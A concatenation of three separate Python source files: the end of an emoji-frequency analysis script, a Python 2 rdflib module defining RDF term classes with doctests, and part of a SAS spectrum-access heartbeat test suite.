df_allemoji_clockfaces = pd.DataFrame(
list(results.counterdict_all_emoji_if_clockfaces.items()), columns=["Emoji", "Count"]
)
df_allemoji_hourglasses = pd.DataFrame(
list(results.counterdict_all_emoji_if_hourglasses.items()), columns=["Emoji", "Count"]
)
df_allemoji_soon = pd.DataFrame(
list(results.counterdict_all_emoji_if_soon.items()), columns=["Emoji", "Count"]
)
df_allemoji_watch = pd.DataFrame(
list(results.counterdict_all_emoji_if_watch.items()), columns=["Emoji", "Count"]
)
df_allemoji_stopwatch = pd.DataFrame(
list(results.counterdict_all_emoji_if_stopwatch.items()), columns=["Emoji", "Count"]
)
df_allemoji_mantelpiece_clock = pd.DataFrame(
list(results.counterdict_all_emoji_if_mantelpiece_clock.items()), columns=["Emoji", "Count"]
)
df_allemoji_timer_clock = pd.DataFrame(
list(results.counterdict_all_emoji_if_timer_clock.items()), columns=["Emoji", "Count"]
)
df_allemoji_alarm_clock = pd.DataFrame(
list(results.counterdict_all_emoji_if_alarm_clock.items()), columns=["Emoji", "Count"]
)
# Export results as CSV files
df_lang.to_csv("./langdata.csv", encoding="utf-8")
df_allemoji.to_csv("./allemojidata.csv", encoding="utf-8")
df_allemoji_match.to_csv("./allemojidatamatch.csv", encoding="utf-8")
df_allemoji_clockfaces.to_csv("./allemojidatamatch_clockfaces.csv", encoding="utf-8")
df_allemoji_hourglasses.to_csv("./allemojidatamatch_hourglasses.csv", encoding="utf-8")
df_allemoji_soon.to_csv("./allemojidatamatch_soon.csv", encoding="utf-8")
df_allemoji_watch.to_csv("./allemojidatamatch_watch.csv", encoding="utf-8")
df_allemoji_stopwatch.to_csv("./allemojidatamatch_stopwatch.csv", encoding="utf-8")
df_allemoji_mantelpiece_clock.to_csv("./allemojidatamatch_mantelpiece_clock.csv", encoding="utf-8")
df_allemoji_timer_clock.to_csv("./allemojidatamatch_timer_clock.csv", encoding="utf-8")
df_allemoji_alarm_clock.to_csv("./allemojidatamatch_alarm_clock.csv", encoding="utf-8")
if __name__ == "__main__":
args = parse_cli_args()
# Characters to match
MATCHES = {
"clockfaces": [
# O'clock emoji
EMOJI_UNICODE[":one_o\u2019clock:"],
EMOJI_UNICODE[":two_o\u2019clock:"],
EMOJI_UNICODE[":three_o\u2019clock:"],
EMOJI_UNICODE[":four_o\u2019clock:"],
EMOJI_UNICODE[":five_o\u2019clock:"],
EMOJI_UNICODE[":six_o\u2019clock:"],
EMOJI_UNICODE[":seven_o\u2019clock:"],
EMOJI_UNICODE[":eight_o\u2019clock:"],
EMOJI_UNICODE[":nine_o\u2019clock:"],
EMOJI_UNICODE[":ten_o\u2019clock:"],
EMOJI_UNICODE[":eleven_o\u2019clock:"],
EMOJI_UNICODE[":twelve_o\u2019clock:"],
# Half past the hour emoji
EMOJI_UNICODE[":one-thirty:"],
EMOJI_UNICODE[":two-thirty:"],
EMOJI_UNICODE[":three-thirty:"],
EMOJI_UNICODE[":four-thirty:"],
EMOJI_UNICODE[":five-thirty:"],
EMOJI_UNICODE[":six-thirty:"],
EMOJI_UNICODE[":seven-thirty:"],
EMOJI_UNICODE[":eight-thirty:"],
EMOJI_UNICODE[":nine-thirty:"],
EMOJI_UNICODE[":ten-thirty:"],
EMOJI_UNICODE[":eleven-thirty:"],
EMOJI_UNICODE[":twelve-thirty:"],
],
# Other clock and time related emoji
"hourglasses": [
EMOJI_UNICODE[":hourglass_done:"],
EMOJI_UNICODE[":hourglass_not_done:"],
],
"soon": [EMOJI_UNICODE[":SOON_arrow:"]],
"watch": [EMOJI_UNICODE[":watch:"]],
"stopwatch": [EMOJI_UNICODE[":stopwatch:"]],
"mantelpiece_clock": [EMOJI_UNICODE[":mantelpiece_clock:"]],
"timer_clock": [EMOJI_UNICODE[":timer_clock:"]],
"alarm_clock": [EMOJI_UNICODE[":alarm_clock:"]],
}
MATCHES_ALL = [emoji for lst in MATCHES.values() for emoji in lst]
# Unpack and list all files
if args.unpack:
unpack_files(args.data_path)
all_files = get_all_files(args.data_path, days=args.days, hours=args.hours)
# Main search loop
RESULTS_GLOBAL = run()
save_results(RESULTS_GLOBAL)
|
|
"""
This module defines the different types of terms...
"""
__all__ = [
'Node',
'Identifier',
'URIRef',
'BNode',
'Literal',
'Variable',
'Statement',
]
import logging
_LOGGER = logging.getLogger(__name__)
import base64
import re
import threading
from urlparse import urlparse, urljoin, urldefrag
from string import ascii_letters, rsplit
from random import choice
from itertools import islice
from datetime import date, time, datetime, timedelta
from time import strptime
from isodate import parse_time, parse_date, parse_datetime
try:
from hashlib import md5
except ImportError:
from md5 import md5
# from sys import version_info
# if version_info[0:2] > (2, 2):
# from unicodedata import normalize
# else:
# normalize = None
#
#from rdflib.syntax.xml_names import is_ncname
#from rdflib.exceptions import Error
class Node(object):
"""
A Node in the Graph.
"""
__slots__ = ()
class Identifier(Node, unicode): # we allow Identifiers to be Nodes in our Graph
"""
See http://www.w3.org/2002/07/rdf-identifer-terminology/
regarding choice of terminology.
"""
__slots__ = ()
def __new__(cls, value):
return unicode.__new__(cls, value)
class URIRef(Identifier):
"""
RDF URI Reference: http://www.w3.org/TR/rdf-concepts/#section-Graph-URIref
"""
__slots__ = ()
def __new__(cls, value, base=None):
if base is not None:
ends_in_hash = value.endswith("#")
value = urljoin(base, value, allow_fragments=1)
if ends_in_hash:
if not value.endswith("#"):
value += "#"
#if normalize and value and value != normalize("NFC", value):
# raise Error("value must be in NFC normalized form.")
try:
rt = unicode.__new__(cls, value)
except UnicodeDecodeError:
rt = unicode.__new__(cls, value, 'utf-8')
return rt
def n3(self):
return "<%s>" % self
def concrete(self):
if "#" in self:
return URIRef("/".join(rsplit(self, "#", 1)))
else:
return self
def abstract(self):
if "#" not in self:
scheme, netloc, path, params, query, fragment = urlparse(self)
if path:
return URIRef("#".join(rsplit(self, "/", 1)))
else:
if not self.endswith("#"):
return URIRef("%s#" % self)
else:
return self
else:
return self
def defrag(self):
if "#" in self:
url, frag = urldefrag(self)
return URIRef(url)
else:
return self
def __reduce__(self):
return (URIRef, (unicode(self),))
def __getnewargs__(self):
return (unicode(self), )
def __ne__(self, other):
return not self.__eq__(other)
def __eq__(self, other):
if isinstance(other, URIRef):
return unicode(self)==unicode(other)
else:
return False
def __str__(self):
return self.encode()
def __repr__(self):
if self.__class__ is URIRef:
clsName = "rdflib.term.URIRef"
else:
clsName = self.__class__.__name__
# quoting risk? drewp is not sure why this doesn't use %r
return """%s('%s')""" % (clsName, str(self))
def md5_term_hash(self):
"""a string of hex that will be the same for two URIRefs that
are the same. It is not a suitable unique id.
Supported for backwards compatibility; new code should
probably just use __hash__
"""
d = md5(str(self))
d.update("U")
return d.hexdigest()
def _letter():
while True:
yield choice(ascii_letters)
def _unique_id():
"""Create a (hopefully) unique prefix"""
uid = "".join(islice(_letter(), 0, 8))
return uid
def _serial_number_generator():
i = 0
while 1:
yield i
i = i + 1
bNodeLock = threading.RLock()
class BNode(Identifier):
"""
Blank Node: http://www.w3.org/TR/rdf-concepts/#section-blank-nodes
"""
__slots__ = ()
def __new__(cls, value=None,
_sn_gen=_serial_number_generator(), _prefix=_unique_id()):
"""
# only store implementations should pass in a value
"""
if value==None:
# so that BNode values do not
# collide with ones created with a different instance of this module
# at some other time.
bNodeLock.acquire()
node_id = _sn_gen.next()
bNodeLock.release()
value = "%s%s" % (_prefix, node_id)
else:
# TODO: check that value falls within acceptable bnode value range
# for RDF/XML needs to be something that can be serialzed
# as a nodeID for N3 ?? Unless we require these
# constraints be enforced elsewhere?
pass #assert is_ncname(unicode(value)), "BNode identifiers
#must be valid NCNames"
return Identifier.__new__(cls, value)
def n3(self):
return "_:%s" % self
def __getnewargs__(self):
return (unicode(self), )
def __reduce__(self):
return (BNode, (unicode(self),))
def __ne__(self, other):
return not self.__eq__(other)
def __eq__(self, other):
"""
>>> BNode("foo")==None
False
>>> BNode("foo")==URIRef("foo")
False
>>> URIRef("foo")==BNode("foo")
False
>>> BNode("foo")!=URIRef("foo")
True
>>> URIRef("foo")!=BNode("foo")
True
"""
if isinstance(other, BNode):
return unicode(self)==unicode(other)
else:
return False
def __str__(self):
return self.encode()
def __repr__(self):
if self.__class__ is BNode:
clsName = "rdflib.term.BNode"
else:
clsName = self.__class__.__name__
return """%s('%s')""" % (clsName, str(self))
def md5_term_hash(self):
"""a string of hex that will be the same for two BNodes that
are the same. It is not a suitable unique id.
Supported for backwards compatibility; new code should
probably just use __hash__
"""
d = md5(str(self))
d.update("B")
return d.hexdigest()
class Literal(Identifier):
"""
RDF Literal: http://www.w3.org/TR/rdf-concepts/#section-Graph-Literal
>>> Literal(1).toPython()
1L
>>> cmp(Literal("adsf"), 1)
1
>>> from rdflib.namespace import XSD
>>> lit2006 = Literal('2006-01-01',datatype=XSD.date)
>>> lit2006.toPython()
datetime.date(2006, 1, 1)
>>> lit2006 < Literal('2007-01-01',datatype=XSD.date)
True
>>> Literal(datetime.utcnow()).datatype
rdflib.term.URIRef('http://www.w3.org/2001/XMLSchema#dateTime')
>>> oneInt = Literal(1)
>>> twoInt = Literal(2)
>>> twoInt < oneInt
False
>>> Literal('1') < Literal(1)
False
>>> Literal('1') < Literal('1')
False
>>> Literal(1) < Literal('1')
True
>>> Literal(1) < Literal(2.0)
True
>>> Literal(1) < URIRef('foo')
True
>>> Literal(1) < 2.0
True
>>> Literal(1) < object
True
>>> lit2006 < "2007"
True
>>> "2005" < lit2006
True
"""
__slots__ = ("language", "datatype", "_cmp_value")
def __new__(cls, value, lang=None, datatype=None):
if lang is not None and datatype is not None:
raise TypeError("A Literal can only have one of lang or datatype, "
"per http://www.w3.org/TR/rdf-concepts/#section-Graph-Literal")
if datatype:
lang = None
else:
value, datatype = _castPythonToLiteral(value)
if datatype:
lang = None
if datatype:
datatype = URIRef(datatype)
try:
inst = unicode.__new__(cls, value)
except UnicodeDecodeError:
inst = unicode.__new__(cls, value, 'utf-8')
inst.language = lang
inst.datatype = datatype
inst._cmp_value = inst._toCompareValue()
return inst
def __reduce__(self):
return (Literal, (unicode(self), self.language, self.datatype),)
def __getstate__(self):
return (None, dict(language=self.language, datatype=self.datatype))
def __setstate__(self, arg):
_, d = arg
self.language = d["language"]
self.datatype = d["datatype"]
def __add__(self, val):
"""
>>> Literal(1) + 1
2L
>>> Literal("1") + "1"
rdflib.term.Literal(u'11')
"""
py = self.toPython()
if isinstance(py, Literal):
s = super(Literal, self).__add__(val)
return Literal(s, self.language, self.datatype)
else:
return py + val
def __lt__(self, other):
"""
>>> from rdflib.namespace import XSD
>>> Literal("YXNkZg==", datatype=XSD[u'base64Binary']) < "foo"
True
>>> u"\xfe" < Literal(u"foo")
False
>>> Literal(base64.encodestring(u"\xfe".encode("utf-8")), datatype=URIRef("http://www.w3.org/2001/XMLSchema#base64Binary")) < u"foo"
False
"""
if other is None:
return False # Nothing is less than None
try:
return self._cmp_value < other
except TypeError, te:
return unicode(self._cmp_value) < other
except UnicodeDecodeError, ue:
if isinstance(self._cmp_value, str):
return self._cmp_value < other.encode("utf-8")
else:
raise ue
def __le__(self, other):
"""
>>> from rdflib.namespace import XSD
>>> Literal('2007-01-01T10:00:00', datatype=XSD.dateTime) <= Literal('2007-01-01T10:00:00', datatype=XSD.dateTime)
True
"""
if other is None:
return False
if self==other:
return True
else:
return self < other
def __gt__(self, other):
if other is None:
return True # Everything is greater than None
try:
return self._cmp_value > other
except TypeError, te:
return unicode(self._cmp_value) > other
except UnicodeDecodeError, ue:
if isinstance(self._cmp_value, str):
return self._cmp_value > other.encode("utf-8")
else:
raise ue
def __ge__(self, other):
if other is None:
return False
if self==other:
return True
else:
return self > other
def __ne__(self, other):
"""
Overriden to ensure property result for comparisons with None via !=.
Routes all other such != and <> comparisons to __eq__
>>> Literal('') != None
True
>>> Literal('2') <> Literal('2')
False
"""
return not self.__eq__(other)
def __hash__(self):
"""
>>> from rdflib.namespace import XSD
>>> a = {Literal('1', datatype=XSD.integer):'one'}
>>> Literal('1', datatype=XSD.double) in a
False
"Called for the key object for dictionary operations,
and by the built-in function hash(). Should return
a 32-bit integer usable as a hash value for
dictionary operations. The only required property
is that objects which compare equal have the same
hash value; it is advised to somehow mix together
(e.g., using exclusive or) the hash values for the
components of the object that also play a part in
comparison of objects." -- 3.4.1 Basic customization (Python)
"Two literals are equal if and only if all of the following hold:
* The strings of the two lexical forms compare equal, character by character.
* Either both or neither have language tags.
* The language tags, if any, compare equal.
* Either both or neither have datatype URIs.
* The two datatype URIs, if any, compare equal, character by character."
-- 6.5.1 Literal Equality (RDF: Concepts and Abstract Syntax)
"""
return Identifier.__hash__(self) ^ hash(self.language) ^ hash(self.datatype)
def __eq__(self, other):
"""
>>> f = URIRef("foo")
>>> f is None or f == ''
False
>>> Literal("1", datatype=URIRef("foo")) == Literal("1", datatype=URIRef("foo"))
True
>>> Literal("1", datatype=URIRef("foo")) == Literal("2", datatype=URIRef("foo"))
False
>>> Literal("1", datatype=URIRef("foo")) == "asdf"
False
>>> from rdflib.namespace import XSD
>>> Literal('2007-01-01', datatype=XSD.date) == Literal('2007-01-01', datatype=XSD.date)
True
>>> Literal('2007-01-01', datatype=XSD.date) == date(2007, 1, 1)
True
>>> oneInt = Literal(1)
>>> oneNoDtype = Literal('1')
>>> oneInt == oneNoDtype
False
>>> Literal("1", XSD[u'string']) == Literal("1", XSD[u'string'])
True
>>> Literal("one", lang="en") == Literal("one", lang="en")
True
>>> Literal("hast", lang='en') == Literal("hast", lang='de')
False
>>> oneInt == Literal(1)
True
>>> oneFloat = Literal(1.0)
>>> oneInt == oneFloat
True
>>> oneInt == 1
True
"""
if other is None:
return False
if isinstance(other, Literal):
return self._cmp_value == other._cmp_value
elif isinstance(other, basestring):
return unicode(self) == other
else:
return self._cmp_value == other
def n3(self):
r'''
Returns a representation in the N3 format.
Examples::
>>> Literal("foo").n3()
u'"foo"'
Strings with newlines or triple-quotes::
>>> Literal("foo\nbar").n3()
u'"""foo\nbar"""'
>>> Literal("''\'").n3()
u'"\'\'\'"'
>>> Literal('"""').n3()
u'"\\"\\"\\""'
Language::
>>> Literal("hello", lang="en").n3()
u'"hello"@en'
Datatypes::
>>> Literal(1).n3()
u'"1"^^<http://www.w3.org/2001/XMLSchema#integer>'
>>> Literal(1, lang="en").n3()
u'"1"^^<http://www.w3.org/2001/XMLSchema#integer>'
>>> Literal(1.0).n3()
u'"1.0"^^<http://www.w3.org/2001/XMLSchema#float>'
Datatype and language isn't allowed (datatype takes precedence)::
>>> Literal(True).n3()
u'"true"^^<http://www.w3.org/2001/XMLSchema#boolean>'
Custom datatype::
>>> footype = URIRef("http://example.org/ns#foo")
>>> Literal("1", datatype=footype).n3()
u'"1"^^<http://example.org/ns#foo>'
'''
return self._literal_n3()
def _literal_n3(self, use_plain=False, qname_callback=None):
'''
Using plain literal (shorthand) output::
>>> Literal(1)._literal_n3(use_plain=True)
u'1'
>>> Literal(1.0)._literal_n3(use_plain=True)
u'1.0'
>>> from rdflib.namespace import XSD
>>> Literal("foo", datatype=XSD.string)._literal_n3(
... use_plain=True)
u'"foo"^^<http://www.w3.org/2001/XMLSchema#string>'
>>> Literal(True)._literal_n3(use_plain=True)
u'true'
>>> Literal(False)._literal_n3(use_plain=True)
u'false'
Using callback for datatype QNames::
>>> Literal(1)._literal_n3(
... qname_callback=lambda uri: u"xsd:integer")
u'"1"^^xsd:integer'
'''
if use_plain and self.datatype in _PLAIN_LITERAL_TYPES:
try:
self.toPython() # check validity
return '%s' % self
except ValueError:
pass # if it's in, we let it out?
encoded = self._quote_encode()
datatype = self.datatype
quoted_dt = None
if datatype:
if qname_callback:
quoted_dt = qname_callback(datatype)
if not quoted_dt:
quoted_dt = "<%s>" % datatype
language = self.language
if language:
if datatype:
# TODO: this isn't valid RDF (it's datatype XOR language)
return '%s@%s^^%s' % (encoded, language, quoted_dt)
return '%s@%s' % (encoded, language)
elif datatype:
return '%s^^%s' % (encoded, quoted_dt)
else:
return '%s' % encoded
def _quote_encode(self):
# This simpler encoding doesn't work; a newline gets encoded as "\\n",
# which is ok in sourcecode, but we want "\n".
#encoded = self.encode('unicode-escape').replace(
# '\\', '\\\\').replace('"','\\"')
#encoded = self.replace.replace('\\', '\\\\').replace('"','\\"')
# NOTE: Could in theory chose quotes based on quotes appearing in the
# string, i.e. '"' and "'", but N3/turtle doesn't allow "'"(?).
# which is nicer?
# if self.find("\"")!=-1 or self.find("'")!=-1 or self.find("\n")!=-1:
if "\n" in self:
# Triple quote this string.
encoded = self.replace('\\', '\\\\')
if '"""' in self:
# is this ok?
encoded = encoded.replace('"""','\\"""')
if encoded.endswith('"'):
encoded = encoded[:-1] + "\\\""
return '"""%s"""' % encoded
else:
return '"%s"' % self.replace('\n','\\n').replace('\\', '\\\\'
).replace('"', '\\"')
def __str__(self):
return self.encode()
def __repr__(self):
args = [super(Literal, self).__repr__()]
if self.language is not None:
args.append("lang=%s" % repr(self.language))
if self.datatype is not None:
args.append("datatype=%s" % repr(self.datatype))
if self.__class__ == Literal:
clsName = "rdflib.term.Literal"
else:
clsName = self.__class__.__name__
return """%s(%s)""" % (clsName, ", ".join(args))
def toPython(self):
"""
Returns an appropriate python datatype derived from this RDF Literal
"""
convFunc = _toPythonMapping.get(self.datatype, None)
if convFunc:
rt = convFunc(self)
else:
rt = self
return rt
def _toCompareValue(self):
try:
rt = self.toPython()
except Exception, e:
_LOGGER.warning("could not convert %s to a Python datatype" %
repr(self))
rt = self
if rt is self:
if self.language is None and self.datatype is None:
return unicode(rt)
else:
return (unicode(rt), rt.datatype, rt.language)
return rt
def md5_term_hash(self):
"""a string of hex that will be the same for two Literals that
are the same. It is not a suitable unique id.
Supported for backwards compatibility; new code should
probably just use __hash__
"""
d = md5(str(self))
d.update("L")
return d.hexdigest()
_XSD_PFX = 'http://www.w3.org/2001/XMLSchema#'
_PLAIN_LITERAL_TYPES = (
URIRef(_XSD_PFX+'integer'),
URIRef(_XSD_PFX+'float'),
#XSD.decimal, XSD.double, # TODO: "subsumed" by float...
URIRef(_XSD_PFX+'boolean'),
)
def _castPythonToLiteral(obj):
"""
Casts a python datatype to a tuple of the lexical value and a
datatype URI (or None)
"""
for pType,(castFunc,dType) in _PythonToXSD:
if isinstance(obj, pType):
if castFunc:
return castFunc(obj), dType
elif dType:
return obj, dType
else:
return obj, None
return obj, None # TODO: is this right for the fall through case?
# Mappings from Python types to XSD datatypes and back (burrowed from sparta)
# datetime instances are also instances of date... so we need to order these.
_PythonToXSD = [
(basestring, (None, None)),
(float , (None, URIRef(_XSD_PFX+'float'))),
(bool , (lambda i:str(i).lower(), URIRef(_XSD_PFX+'boolean'))),
(int , (None, URIRef(_XSD_PFX+'integer'))),
(long , (None, URIRef(_XSD_PFX+'long'))),
(datetime , (lambda i:i.isoformat(), URIRef(_XSD_PFX+'dateTime'))),
(date , (lambda i:i.isoformat(), URIRef(_XSD_PFX+'date'))),
(time , (lambda i:i.isoformat(), URIRef(_XSD_PFX+'time'))),
]
XSDToPython = {
URIRef(_XSD_PFX+'time') : parse_time,
URIRef(_XSD_PFX+'date') : parse_date,
URIRef(_XSD_PFX+'dateTime') : parse_datetime,
URIRef(_XSD_PFX+'string') : None,
URIRef(_XSD_PFX+'normalizedString') : None,
URIRef(_XSD_PFX+'token') : None,
URIRef(_XSD_PFX+'language') : None,
URIRef(_XSD_PFX+'boolean') : lambda i:i.lower() in ['1','true'],
URIRef(_XSD_PFX+'decimal') : float,
URIRef(_XSD_PFX+'integer') : long,
URIRef(_XSD_PFX+'nonPositiveInteger') : int,
URIRef(_XSD_PFX+'long') : long,
URIRef(_XSD_PFX+'nonNegativeInteger') : int,
URIRef(_XSD_PFX+'negativeInteger') : int,
URIRef(_XSD_PFX+'int') : long,
URIRef(_XSD_PFX+'unsignedLong') : long,
URIRef(_XSD_PFX+'positiveInteger') : int,
URIRef(_XSD_PFX+'short') : int,
URIRef(_XSD_PFX+'unsignedInt') : long,
URIRef(_XSD_PFX+'byte') : int,
URIRef(_XSD_PFX+'unsignedShort') : int,
URIRef(_XSD_PFX+'unsignedByte') : int,
URIRef(_XSD_PFX+'float') : float,
URIRef(_XSD_PFX+'double') : float,
URIRef(_XSD_PFX+'base64Binary') : base64.decodestring,
URIRef(_XSD_PFX+'anyURI') : None,
}
_toPythonMapping = {}
_toPythonMapping.update(XSDToPython)
def bind(datatype, conversion_function):
"""
bind a datatype to a function for converting it into a Python
instance.
"""
if datatype in _toPythonMapping:
_LOGGER.warning("datatype '%s' was already bound. Rebinding." %
datatype)
_toPythonMapping[datatype] = conversion_function
class Variable(Identifier):
"""
"""
__slots__ = ()
def __new__(cls, value):
if value[0]=='?':
value=value[1:]
return unicode.__new__(cls, value)
def __repr__(self):
return self.n3()
def n3(self):
return "?%s" % self
def __reduce__(self):
return (Variable, (unicode(self),))
def md5_term_hash(self):
"""a string of hex that will be the same for two Variables that
are the same. It is not a suitable unique id.
Supported for backwards compatibility; new code should
probably just use __hash__
"""
d = md5(str(self))
d.update("V")
return d.hexdigest()
class Statement(Node, tuple):
def __new__(cls, (subject, predicate, object), context):
return tuple.__new__(cls, ((subject, predicate, object), context))
def __reduce__(self):
return (Statement, (self[0], self[1]))
if __name__ == '__main__':
import doctest
doctest.testmod()
|
|
# Copyright 2016 SAS Project Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from datetime import datetime
import time
import json
import os
import unittest
import logging
import sas
from util import winnforum_testcase
class HeartbeatTestcase(unittest.TestCase):
def setUp(self):
self._sas, self._sas_admin = sas.GetTestingSas()
self._sas_admin.Reset()
def tearDown(self):
pass
@winnforum_testcase
def test_10_9_4_1_1_1(self):
"""Heartbeat request immediately after CBSD moves into Granted State.
The response should be SUCCESS.
"""
# Register the device
device_a = json.load(
open(os.path.join('testcases', 'testdata', 'device_a.json')))
self._sas_admin.InjectFccId({'fccId': device_a['fccId']})
request = {'registrationRequest': [device_a]}
response = self._sas.Registration(request)['registrationResponse'][0]
# Check registration response
self.assertEqual(response['response']['responseCode'], 0)
cbsd_id = response['cbsdId']
del request, response
# Request grant
grant_0 = json.load(
open(os.path.join('testcases', 'testdata', 'grant_0.json')))
grant_0['cbsdId'] = cbsd_id
request = {'grantRequest': [grant_0]}
# Check grant response
response = self._sas.Grant(request)['grantResponse'][0]
self.assertEqual(response['cbsdId'], cbsd_id)
self.assertTrue(response['grantId'])
self.assertEqual(response['response']['responseCode'], 0)
grant_id = response['grantId']
del request, response
# Heartbeat
request = {
'heartbeatRequest': [{
'cbsdId': cbsd_id,
'grantId': grant_id,
'operationState': 'GRANTED'
}]
}
response = self._sas.Heartbeat(request)['heartbeatResponse'][0]
# Check the heartbeat response
self.assertEqual(response['cbsdId'], cbsd_id)
self.assertEqual(response['grantId'], grant_id)
self.assertLess(datetime.utcnow(),
datetime.strptime(response['transmitExpireTime'],
'%Y-%m-%dT%H:%M:%SZ'))
self.assertEqual(response['response']['responseCode'], 0)
@winnforum_testcase
def test_WINNF_FT_S_HBT_2(self):
"""Multiple heartbeat requests after moving to Granted/Heartbeating state.
Returns response code 0 (NO_ERROR) for all requests
"""
# Register three devices
device_a = json.load(
open(os.path.join('testcases', 'testdata', 'device_a.json')))
self._sas_admin.InjectFccId({'fccId': device_a['fccId']})
device_b = json.load(
open(os.path.join('testcases', 'testdata', 'device_b.json')))
self._sas_admin.InjectFccId({'fccId': device_b['fccId']})
device_c = json.load(
open(os.path.join('testcases', 'testdata', 'device_c.json')))
self._sas_admin.InjectFccId({'fccId': device_c['fccId']})
request = {'registrationRequest': [device_a, device_b, device_c]}
response = self._sas.Registration(request)['registrationResponse']
cbsd_ids = []
for resp in response:
self.assertEqual(resp['response']['responseCode'], 0)
cbsd_ids.append(resp['cbsdId'])
del request, response
# Create and send grant requests
grant_0 = json.load(
open(os.path.join('testcases', 'testdata', 'grant_0.json')))
grant_0['cbsdId'] = cbsd_ids[0]
grant_1 = json.load(
open(os.path.join('testcases', 'testdata', 'grant_0.json')))
grant_1['cbsdId'] = cbsd_ids[1]
grant_2 = json.load(
open(os.path.join('testcases', 'testdata', 'grant_0.json')))
grant_2['cbsdId'] = cbsd_ids[2]
request = {'grantRequest': [grant_0, grant_1, grant_2]}
# Check grant response
response = self._sas.Grant(request)['grantResponse']
self.assertEqual(len(response), 3)
grant_ids = []
grant_expire_times = []
for response_num, resp in enumerate(response):
self.assertEqual(resp['cbsdId'], cbsd_ids[response_num])
self.assertEqual(resp['response']['responseCode'], 0)
grant_ids.append(resp['grantId'])
grant_expire_times.append(
datetime.strptime(resp['grantExpireTime'], '%Y-%m-%dT%H:%M:%SZ'))
del request, response
# Heartbeat the devices
heartbeat_request = []
for cbsd_id, grant_id in zip(cbsd_ids, grant_ids):
heartbeat_request.append({
'cbsdId': cbsd_id,
'grantId': grant_id,
'operationState': 'GRANTED'
})
request = {'heartbeatRequest': heartbeat_request}
response = self._sas.Heartbeat(request)['heartbeatResponse']
# Check the heartbeat response
self.assertEqual(len(response), 3)
for response_num, resp in enumerate(response):
self.assertEqual(resp['cbsdId'], cbsd_ids[response_num])
self.assertEqual(resp['grantId'], grant_ids[response_num])
transmit_expire_time = datetime.strptime(resp['transmitExpireTime'],
'%Y-%m-%dT%H:%M:%SZ')
self.assertLess(datetime.utcnow(), transmit_expire_time)
self.assertLessEqual(
(transmit_expire_time - datetime.utcnow()).total_seconds(), 240)
self.assertLessEqual(transmit_expire_time,
grant_expire_times[response_num])
self.assertEqual(resp['response']['responseCode'], 0)
@winnforum_testcase
def test_WINNF_FT_S_HBT_3(self):
"""Request grant renewal from heartbeat request.
Returns response code 0 (NO_ERROR)
"""
# Register the device
device_a = json.load(
open(os.path.join('testcases', 'testdata', 'device_a.json')))
self._sas_admin.InjectFccId({'fccId': device_a['fccId']})
request = {'registrationRequest': [device_a]}
response = self._sas.Registration(request)['registrationResponse'][0]
# Check registration response
self.assertEqual(response['response']['responseCode'], 0)
cbsd_id = response['cbsdId']
del request, response
# Request grant
grant_0 = json.load(
open(os.path.join('testcases', 'testdata', 'grant_0.json')))
grant_0['cbsdId'] = cbsd_id
request = {'grantRequest': [grant_0]}
# Check grant response
response = self._sas.Grant(request)['grantResponse'][0]
self.assertEqual(response['cbsdId'], cbsd_id)
grant_id = response['grantId']
self.assertEqual(response['response']['responseCode'], 0)
grant_expire_time = datetime.strptime(response['grantExpireTime'],
'%Y-%m-%dT%H:%M:%SZ')
del request, response
# First successful Heartbeat
request = {
'heartbeatRequest': [{
'cbsdId': cbsd_id,
'grantId': grant_id,
'operationState': 'GRANTED',
'grantRenew': True
}]
}
response = self._sas.Heartbeat(request)['heartbeatResponse'][0]
# Check the heartbeat response
self.assertEqual(response['cbsdId'], cbsd_id)
self.assertEqual(response['grantId'], grant_id)
transmit_expire_time = datetime.strptime(response['transmitExpireTime'],
'%Y-%m-%dT%H:%M:%SZ')
self.assertLess(datetime.utcnow(), transmit_expire_time)
self.assertLessEqual(
(transmit_expire_time - datetime.utcnow()).total_seconds(), 240)
self.assertLessEqual(transmit_expire_time, grant_expire_time)
self.assertLess(datetime.utcnow(), grant_expire_time)
self.assertEqual(response['response']['responseCode'], 0)
@winnforum_testcase
def test_WINNF_FT_S_HBT_4(self):
"""Request grant renewal from heartbeat request (3 devices).
Returns response code 0 (NO_ERROR)
"""
# Register the devices
registration_request = []
for device_filename in ('device_a.json', 'device_b.json', 'device_c.json'):
device = json.load(
open(os.path.join('testcases', 'testdata', device_filename)))
self._sas_admin.InjectFccId({'fccId': device['fccId']})
registration_request.append(device)
request = {'registrationRequest': registration_request}
response = self._sas.Registration(request)['registrationResponse']
# Check registration response
cbsd_ids = []
for resp in response:
self.assertEqual(resp['response']['responseCode'], 0)
cbsd_ids.append(resp['cbsdId'])
del request, response
# Request grant
grant_request = []
for grant_filename, cbsd_id in zip(
['grant_0.json', 'grant_0.json', 'grant_0.json'], cbsd_ids):
grant = json.load(
open(os.path.join('testcases', 'testdata', grant_filename)))
grant['cbsdId'] = cbsd_id
grant_request.append(grant)
request = {'grantRequest': grant_request}
# Check grant response
response = self._sas.Grant(request)['grantResponse']
grant_ids = []
grant_expire_times = []
for response_num, resp in enumerate(response):
self.assertEqual(resp['cbsdId'], cbsd_ids[response_num])
self.assertGreater(len(resp['grantId']), 0)
self.assertEqual(resp['response']['responseCode'], 0)
grant_ids.append(resp['grantId'])
grant_expire_times.append(
datetime.strptime(resp['grantExpireTime'], '%Y-%m-%dT%H:%M:%SZ'))
del request, response
# Heartbeat requests with grantRenew set to True
heartbeat_request = []
for cbsd_id, grant_id in zip(cbsd_ids, grant_ids):
heartbeat_request.append({
'cbsdId': cbsd_id,
'grantId': grant_id,
'operationState': 'GRANTED',
'grantRenew': True
})
request = {'heartbeatRequest': heartbeat_request}
response = self._sas.Heartbeat(request)['heartbeatResponse']
# Check the heartbeat response
for response_num, resp in enumerate(response):
transmit_expire_time = datetime.strptime(resp['transmitExpireTime'],
'%Y-%m-%dT%H:%M:%SZ')
self.assertEqual(resp['cbsdId'], cbsd_ids[response_num])
self.assertEqual(resp['grantId'], grant_ids[response_num])
self.assertLess(datetime.utcnow(), transmit_expire_time)
self.assertLessEqual(
(transmit_expire_time - datetime.utcnow()).total_seconds(), 240)
self.assertLessEqual(transmit_expire_time,
grant_expire_times[response_num])
self.assertLess(datetime.utcnow(), grant_expire_times[response_num])
self.assertEqual(resp['response']['responseCode'], 0)
@winnforum_testcase
